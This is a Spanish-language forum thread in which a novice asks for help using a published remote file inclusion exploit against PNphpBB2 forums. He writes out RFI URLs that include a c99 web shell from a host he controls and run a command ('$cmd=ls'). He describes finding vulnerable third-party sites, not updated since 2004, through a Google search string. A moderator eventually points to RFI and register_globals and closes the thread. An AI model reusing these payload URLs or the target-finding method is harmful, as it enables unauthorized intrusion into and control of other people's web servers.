siento que me van a abuchear, pero me he leido los topics de aqui, y aun no comprendo...

es sobre las shells remotas...

estoy intentando utilizar este exploit
http://www.milw0rm.com/exploits/2390

pero donde dice:
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

eso es lo que no logro comprender, me he creado una shell con cyberspace.org, pero no supe como agregarla al link.

en pocas palabras, algien me podria explicar como tener esa shell que marca el exploit?

dijamos que yo ya cuento con el domain claro...

ok, ya tengo mi shell, pero ya van varias paginas que pruebo (recalcando que son paginas que no se han actualizado desde el 2004)

y me dice "no se encuentra esta pagina" cuando intento meter el exploit...

que estare haciendo mal?

aqui la sintaxis que utilizo:

http://www.(webatacada).com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://usuarios/lycos/(miusuario)/c99.txt?$cmd=ls

en google pongo: powered by PNphpBB2

PD: NO SE VE EL VIDEO jeje

   una duda


la diferencia esta en que al final va: NOIMPORTA=

pero, podrias explicarlo? porque lleva noimporta=? digo, para saber lo que hago y no ser solo un sriptkiddie...

¿que tal si aprenden PHP y ven donde esta el bug?
busquen informacion sobre RFI (Remote File Inclusion), sobre que es register globals, y porque es inseguro tenerlo activado.. y como se aplica al bug que quieres explotar.

tema cerrado.

Saludos!!